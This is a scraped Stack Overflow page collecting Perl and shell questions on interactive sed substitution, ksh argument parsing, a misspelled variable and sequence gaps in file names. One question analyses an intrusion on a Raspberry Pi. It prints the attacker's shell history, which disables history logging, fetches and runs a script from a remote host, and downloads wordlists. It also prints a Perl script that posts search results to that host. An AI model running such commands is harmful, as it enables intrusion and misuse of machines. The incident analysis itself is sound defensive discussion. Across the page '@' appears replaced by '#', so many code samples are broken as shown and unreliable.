How to ask for confirmation using the command `sed` [closed] - linux

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 3 years ago.
Improve this question
I'm trying to replace a string over multiple files using the command sed like:
grep -rl matchstring somedir/ | xargs sed -i 's/string1/string2/g'
My question is: is there a way to enable it to ask for confirmation at each substitution?
I tried to include the latter c after g in the substitution command, but it didn't succeed.
Thank you in advance for any comments.

The sed utility does not have confirmation ability. If/Until it is implemented, consider using other tools.
The 'ex' (vim in command line mode), has lot of power, including per change confirmation. The confirmation mode is geared toward visual usage. One problem is that once a single change is not approved, the substitution stop. On the surface, this is not what is being asked.
Potentially solution will be to use scripting engine capable of substitutions, and implement a confirmation logic. Awk, Perl, python meet those requirements.
Perl has edit in place option. Script can be invoked with 'perl -i.bak'.
Security: Notice code may need additional protection against injection into RE. See below
Activate:
grep -rl matchstring somedir/ | xargs perl -i.bak sub-conf.pl 'string1' 'string2'
#! /usr/bin/perl
use strict ;
my ($in_pattern, $replacement) = (shift, shift) ;
# Convert string to regexp, disable special characters, etc.
my $pattern = quotemeta($in_pattern) ;
open TTY, "/dev/tty" or die "Failed to open TTY: $!" ;
# Read a line into orig
my $eof ;
while ( my $orig = <> ) {
my $new = $orig =~ s/$pattern/$replacement/gr ;
if ( $new ne $orig ) {
print STDERR "Replace line ${.}:\n< ${orig}> $new" ;
while (1) {
print STDERR "(Y/N) ?" ;
my $yn = <TTY> ;
unless ( defined($yn) ) { $eof = 1 ; last } ;
if ( $yn =~ /[Yy]/ ) { print $new ; last ; } ;
if ( $yn =~ /[Nn]/ ) { print $orig ; last ; } ;
} ;
} else {
print $orig ;
} ;
die 'EOF' if $eof ;
} ;
See: How can I safely validate an untrusted regex in Perl? for explanation of the injection protection in case command need to be extended to accept REGEX.

Related

Parsing long and short args in ksh using loop

I am trying to parse arguments in ksh. Can't do getopt for the same as in short options I have two/three characters. Currently I am using for loop. Its stupid but am unable to find something better.
Question: How do I set option+value as one unit in order to parse?
Also if eval set -- $option will help me then how do I use it? echo on option does not show the expected "--" at the end. Am I assuming something wrong?
I am thinking of using a variable to keep track of when an option is found but this method seems too confusing and unnecessary.
Thanks for your time and help.
Update 1:
Adding code as pointed out. Thanks to markp, Andre Gelinas and random down-voter in making this question better. Trying to execute the script as given in line 2 and 3 of code - or any other combination of short and long options passed together.
#!/bin/ksh
# bash script1.sh --one 123 --two 234 --three "some string"
# bash script1.sh -o 123 -t 234 -th "some string"
# the following creates problems for short options.
#options=$(getopt -o o:t:th: -l one:two:three: "--" "$#")
#Since the below `eval set -- "$options"` did not append "--" at the end
#eval set -- "$options"
for i in $#; do
options="$options $i"
done
options="$options --"
# TODO capture args into variables
Attempted code below TODO until now:
for i in $options; do
echo $i
done
Will be capturing the args using:
while true; do
case $1 in
--one|-o) shift; ONE=$1
;;
--two|-t) shift; TWO=$1
;;
--three|-th) shift; THREE=$1
;;
--) shift; break
;;
esac
done
Try something like this :
#!/bin/ksh
#Default value
ONE=123
TWO=456
# getopts configuration
USAGE="[-author?Andre Gelinas <andre.gelinas#foo.bar>]"
USAGE+="[-copyright?2018]"
USAGE+="[+NAME?TestGetOpts.sh]"
USAGE+="[+DESCRIPTION?Try out for GetOps]"
USAGE+="[o:one]#[one:=$ONE?First.]"
USAGE+="[s:second]#[second:=$TWO?Second.]"
USAGE+="[t:three]:[three?Third.]"
USAGE+=$'[+SEE ALSO?\aman\a(1), \aGetOpts\a(1)]'
while getopts "$USAGE" optchar ; do
case $optchar in
o) ONE=$OPTARG ;;
s) TWO=$OPTARG ;;
t) THREE=$OPTARG ;;
esac
done
print "ONE = "$ONE
print "TWO = "$TWO
print "THREE = "$THREE
You can use either --one or -o. Using --man or --help are also working. Also -o and -s are numeric only, but -t will take anything. Hope this help.

After securing my webserver (rpi) from foreign ssh logins, I found this perl script on my computer. Can someone tell me what it does? [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 5 years ago.
Improve this question
There was an account named "user" that would be used for these logins, which would be from all over the world. I spent several hours yesterday securing the computer and there have been no logins since that time. I awked the /var/log/auth.log into a list of ips ordered from oldest to most recent login, if that somehow helps:
185.145.252.26
185.145.252.36
109.236.83.3
104.167.2.4
217.23.13.125
185.38.148.238
194.88.106.146
43.225.107.70
194.88.107.163
192.162.101.217
62.112.11.88
194.63.141.141
194.88.107.162
74.222.19.247
194.88.107.164
178.137.184.237
167.114.210.108
5.196.76.41
118.70.72.25
109.236.91.85
62.112.11.222
91.195.103.172
62.112.11.94
62.112.11.90
188.27.75.73
194.88.106.197
194.88.107.165
38.84.132.236
91.197.235.11
62.112.11.79
62.112.11.223
144.76.112.21
185.8.7.144
91.230.47.91
91.230.47.92
91.195.103.189
91.230.47.89
91.230.47.90
109.236.89.72
195.228.11.82
109.236.92.184
46.175.121.38
94.177.190.188
171.251.76.179
173.212.230.79
144.217.75.30
5.141.202.235
31.207.47.36
62.112.11.86
217.23.2.183
217.23.1.87
154.122.98.44
41.47.42.128
41.242.137.33
171.232.175.131
41.114.123.190
1.54.115.72
108.170.8.185
86.121.85.122
91.197.232.103
160.0.224.69
217.23.2.77
212.83.171.102
41.145.17.243
62.112.11.81
82.79.252.36
41.114.63.134
5.56.133.126
109.120.131.106
76.68.108.151
113.20.108.27
46.246.61.20
146.185.28.52
45.32.219.199
One of the first things I did after changing the password of the "user" account was running history, which gave me this result:
1 sudo
2 sudo
3 sudo service vsftpd stop
4 su clay
5 unset PROMPT_COMMAND
6 PS1='[PEXPECT]\$'
7 wget http://xpl.silverlords.org/bing -O bing
8 wget http://www.silverlords.org/wordlist/xaaaaaaaaqb.txt -O word ; perl bing word
9 wget http://www.silverlords.org/wordlist/xaaaaaaaaiv.txt -O word ; perl bing word
10 uname
11 n
12 uname
13 history
I then ran cat /home/user/.bash_history for more but what I already had was all that was in the file.
In "user"'s home folder, I found four files, bing, output.13.19.27.txt , output.16.10.38.txt, and word. All were empty except bing, which was a perl script:
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
use LWP::Simple;
use POSIX qw(strftime);
my $data = strftime "%H.%M.%S", gmtime;
my $ARGC = #ARGV;
if ($ARGC !=1) {
printf "$0 arquivo.txt\n";
printf "Coded by: Al3xG0 x#~\n";
exit(1);
}
my $st = rand();
my $filename = $ARGV[0];
print "Input Filename - $filename\n";
my $max_results = 2;
open (IFH, "< $filename") or die $!;
open (OFH, "> output.${data}.txt") or die $!;
while (<IFH>) {
next if /^ *$/;
my $search_word = $_;
$search_word =~ s/\n//;
print "Results for -$search_word-\n";
for (my $i = 0; $i < $max_results; $i += 10) {
my $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30); $b->env_proxy;
my $c = $b->get('http://www.bing.com/search?q=' . $search_word . '&first=' . $i . '&FORM=PERE')->content;
my $check = index($c, 'sb_pagN');
if ($check == -1) { last; }
while (1) {
my $n = index($c, '<h2><a href="');
if ($n == -1) { last; }
$c = substr($c, $n + 13);
my $s = substr($c, 0, index($c, '"'));
my $save = undef;
if ($s =~ /http:\/\/([^\/]+)\//g) { $save = $s; }
print "$save\n";
#if ($save !~ /^ *$/) { print OFH "$save\n"; print "$save\n"};
getprint("http://post.silverlords.org/sites.php?site=$save");
}
}
print "\n";
}
close (IFH);
close (OFH);
I don't know perl, and after spending so much time with sshd config, blacklists, etc., I don't really have the time or energy to learn. If anyone could tell me what the script does and/or what the attackers were trying to do that would be great.
Thanks so much,
Clay
EDIT: I found this article that could explain the purpose of the bing search script: https://www.wired.com/2013/02/microsoft-bing-fights-botnets/
It reads the file passed on the command line, and uses each line as a phrase to do a Bing search. It prints the URL of every search result returned by Bing, and also sends it to http://post.silverlords.org/sites.php?site=$save where $saveis the URL
It used to write the same URLs to the output.HH.MM.SS.txt files, but that line has been commented out so the files are created but left empty
So it's just a command-line bing search; nothing too sinister. Essentially nothing that they couldn't run on any machine that has access to bing
This is not an answer but merely an overlong comment about the observations I made.
When I issue the wget ... -O word commands, it works for me and I receive two files full of words. Looks like a list of random words, maybe passwords for a brute-force attack:
first file: (excerpt)
kalcio
kalciolaria
kalciolariaconia2
kalciov
kalcistn
kalcit
kalcit
kalcita
...
second file: (excerpt)
curious2s
curious2saab95
curious2:saab95
curious2see
curious2see
curious2squeak2
curious2swingineverton
Curious2tender
curious2tryany2asdfg
CURIOUS2TRYIT
curious2trythre092703
...
The Perl script bing is written by someone who's not familiar with Perl. He uses beginner's style from bad tutorials and/or obviously doesn't know the language very well.
Because he issued su clay he might know that such a user (presumably your user) even exists on that machine, without examining /etc/passwd or similar.
As #borodin and #melpomene say, the script searches bing for these words and then parses the resulting bing-page for URLs and then submits them to post.silverlords.org.
As the script currently is, it only abuses your computer's CPU and network to get its work done. The "work" is to massively submit Bing searches for all the words and collect the results at post.silverlords.org.

Why can't I print a very long string? [closed]

Closed. This question is not reproducible or was caused by typos. It is not currently accepting answers.
This question was caused by a typo or a problem that can no longer be reproduced. While similar questions may be on-topic here, this one was resolved in a way less likely to help future readers.
Closed 8 years ago.
Improve this question
I'm writing a Perl script that searches a kml file and I need to print a very long line of latitude/longitude coordinates. The following script successfully finds the string I'm looking for, but just prints a blank line instead of the value of the string:
#!/usr/bin/perl
# Strips unsupported tags out of a QGIS-generated kml and writes a new one
$file = $ARGV[0];
# read existing kml file
open( INFO, $file ); # Open the file
#lines = <INFO>; # Read it into an array
close(INFO); # Close the file
#print #lines; # Print the array
$x = 0;
$coord_string = "<coordinates>";
# go through each line looking for above string
foreach $line (#lines) {
$x++;
if ( $x > 12 ) {
if ( $line =~ $coord_string ) {
$thisCooordString = $line;
$var_startX = $x;
print "Found coord string: $thisCoordString\n";
print " on line: $var_startX\n";
}
}
}
The file that it's reading is here
and this is the output I get:
-bash-4.3$ perl writekml.pl HUC8short.kml
Found coord string:
on line: 25
Found coord string:
on line: 38
Is there some cap on the maximum length that a string can be in Perl? The longest line in this file is ~151,000 characters long. I've verified that all the lines in the file are read successfully.
You've misspelled the variable name (two os vs three os):
$thisCooordString = $line;
...
print "Found coord string: $thisCoordString\n";
Add use strict and use warnings to your script to prevent these sorts of errors.
Always include use strict and use warnings in EVERY perl script.
If you had done this, you would've gotten the following error message to clue you into your bug:
Global symbol "$thisCoordString" requires explicit package name
Adding these pragmas and simplifying your code results in the following:
#!/usr/bin/env perl
# Strips unsupported tags out of a QGIS-generated kml and writes a new one
use strict;
use warnings;
local #ARGV = 'HUC8short.kml';
while (<>) {
if ( $. > 12 && /<coordinates>/ ) {
print "Found coord string: $_\n";
print " on line: $.\n";
}
}
You can even try with perl one liners as shown below:
Perl One liner on windows command prompt:
perl -lne "if($_ =~ /<coordinates>/is && $. > 12) { print \"Found coord string : $_ \n"; print \" on line : $. \n\";}" HUC8short.kml
Perl One liner on unix prompt:
perl -lne 'if($_ =~ /<coordinates>/is && $. > 12) { print "Found coord string : $_ \n"; print " on line : $. \n";}' HUC8short.kml
As others have pointed out, you need. No, you MUST always use use strict; and use warnings;.
If you used strict, you would have gotten an error message telling you that your variable $thisCoordString or $thisCooordString was not declared with my. Using warnings would have warned you that you're printing an undefined string.
Your whole program is written in a very old (and obsolete) Perl programming style. This is the type of program writing I would have done back in Perl 3.0 days about two decades ago. Perl has changed quite a bit since then, and using the newer syntax will allow you to write easier to read and maintain programs.
Here's your basic program written in a more modern syntax:
#! /usr/bin/env perl
#
use strict; # Lets you know when you misspell variable names
use warnings; # Warns of issues (using undefined variables
use feature qw(say); # Let's you use 'say' instead of 'print' (No \n needed)
use autodie; # Program automatically dies on bad file operations
use IO::File; # Lots of nice file activity.
# Make Constants constant
use constant {
COORD_STRING => qr/<coordinates>/, # qr is a regular expression quoted string
};
my $file = shift;
# read existing kml file
open my $fh, '<', $file; # Three part open with scalar filehandle
while ( my $line = <$fh> ) {
chomp $line; # Always "chomp" on read
next unless $line =~ COORD_STRING; #Skip non-coord lines
say "Found coord string: $line";
say " on line: " . $fh->input_line_number;
}
close $fh;
Many Perl developers are self taught. There is nothing wrong with that, but many people learn Perl from looking at other people's obsolete code, or from reading old Perl manuals, or from developers who learned Perl from someone else back in the 1990s.
So, get some books on Modern Perl and learn the new syntax. You might also want to learn about things like references which can lead you to learn Object Oriented Perl. References and OO Perl will allow you to write longer and more complex programs.

Shell Script to parse/retrieve a string found after another string/match

The shell script will be passed a string of arguments. The position of the key/value I am looking to parse out may change over time, i.e. it may come before or after another key at any time so parsing between two keys wouldn't be an option.
I am looking to parse the domain key out of a string like this:
maxpark 0 maxsub n domain sample.foo maxlst n max_defer_fail_percentage user oli force no_cache_update 0 maxpop n maxaddon 0 locale en contactemail
The key would be "domain" the value would be "sample.foo". The domain key could have more than one '.' in it so I would need to grab the entire domain key.
I am not the best with regular expressions but I imagine using 'sed' is what I'm going to need to do.
I am accessing this full string using $*, if I could simply reference the key by accessing $DOMAIN that would be great, but since my only option is to access based on position, $3, and the position could change, that isn't an option
Solved the problem using PERL.
#!/usr/bin/perl -w
use strict;
my %OPTS = #ARGV;
open(FILE, "</var/named/$OPTS{'domain'}.db") || die "File not found";
my #lines = <FILE>;
close(FILE);
my #newlines;
foreach(#lines) {
$_ =~ s/$LOCAL_IP/$PUBLIC_IP/g;
push(#newlines,$_);
}
open(FILE, ">/var/named/$OPTS{'domain'}.db") || die "File not found";
print FILE #newlines;
close(FILE);
If you do have perl, just use this one-liner from your shell script.
domain=$( echo $* | perl -ne '/domain\s([^\s]+)\s/ and print "$1"' )
Or if you'd rather just do it with sed:
domain=$( echo $* | sed 's/.*\<domain \([^ ]\+\).*/\1/' )

Selecting surrounding lines around the missing sequence numbers [closed]

It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center.
Closed 11 years ago.
I have one file inside that file it is present as given below
TEST_4002_sample11_1_20110531.TXT
TEST_4002_sample11_2_20110531.TXT
TEST_4002_sample11_4_20110531.TXT
TEST_4002_sample11_5_20110531.TXT
TEST_4002_sample11_6_20110531.TXT
TEST_4002_sample10_1_20110531.TXT
TEST_4002_sample10_2_20110531.TXT
TEST_4002_sample10_4_20110531.TXT
TEST_4002_sample10_5_20110531.TXT
I want the output if the 4th filed of that file sequence is missing, then print previous file name and next file name as output.
TEST_4002_sample11_2_20110531.TXT
TEST_4002_sample11_4_20110531.TXT
TEST_4002_sample10_2_20110531.TXT
TEST_4002_sample10_4_20110531.TXT
This awk variant seems to produce the required output:
awk -F_ '$4>c+1{print p"\n"$0}{p=$0;c=$4}'
simple perl way:
perl -F_ -lane 'print "$o\n$_" if $F[3]-$n>1;$o=$_;$n=$F[3]' < file
In Perl you could do something like this:
use strict;
use warnings;
my $prev_line;
my $prev_val;
while(<>){
# get the 4th value
my $val = (split '_')[3];
# skip if invalid line
next if !defined $val;
# print if missed sequence
if(defined($prev_val) && $val > $prev_val + 1){
print $prev_line . $_;
}
# save for next iteration
$prev_line = $_;
$prev_val = $val;
}
Save that in foo.pl and run it with something like:
cat file.txt | perl foo.pl
I'm sure it can be shortened quite a lot. Could use something like this if all lines are valid:
perl -n -e '$v=(/[^_]/g)[3];print"$l$_"if$l&&$v>$p+1;$p=$v;$l=$_' file.txt
or
perl -naF_ -e '$v=$F[3];print"$l$_"if$l&&$v>$p+1;$p=$v;$l=$_' file.txt
As far as I understand what you need, here is a Perl script that do the job:
#!/usr/local/bin/perl
use strict;
use warnings;
my $prev = '';
my %seq1;
while(<DATA>) {
chomp;
my ($seq1, $seq2) = $_ =~ /^.*?(\d+)_(\d+)_\d+\.TXT$/;
$seq1{$seq1} = $seq2 - 1 unless exists $seq1{$seq1};
if ($seq1{$seq1}+1 != $seq2) {
print $prev,"\n",$_,"\n";
}
$prev = $_;
$seq1{$seq1} = $seq2;
}
__DATA__
TEST_4002_sample11_1_20110531.TXT
TEST_4002_sample11_2_20110531.TXT
TEST_4002_sample11_4_20110531.TXT
TEST_4002_sample11_5_20110531.TXT
TEST_4002_sample11_6_20110531.TXT
TEST_4002_sample10_1_20110531.TXT
TEST_4002_sample10_2_20110531.TXT
TEST_4002_sample10_4_20110531.TXT
TEST_4002_sample10_5_20110531.TXT
output:
TEST_4002_sample11_2_20110531.TXT
TEST_4002_sample11_4_20110531.TXT
TEST_4002_sample10_2_20110531.TXT
TEST_4002_sample10_4_20110531.TXT
I used glob to get the files (it's possible that it's as simple as <TEST_*.TXT>).
use strict;
use warnings;
my %last = ( name => '', group => '', seq => 0 );
foreach my $file ( sort glob('TEST_[0-9][0-9][0-9][0-9]_sample[0-9][0-9]_[0-9]_*.TXT')
) {
my ( $group, $seq ) = $file =~ m/(\d{4,}_sample\d+)_(\d+)/;
if ( $group eq $last{group} && $seq - $last{seq} > 1 ) {
print join( "\n", $last{name}, $file, '' );
}
#last{ qw<name group seq> } = ( $file, $group, $seq );
}

Resources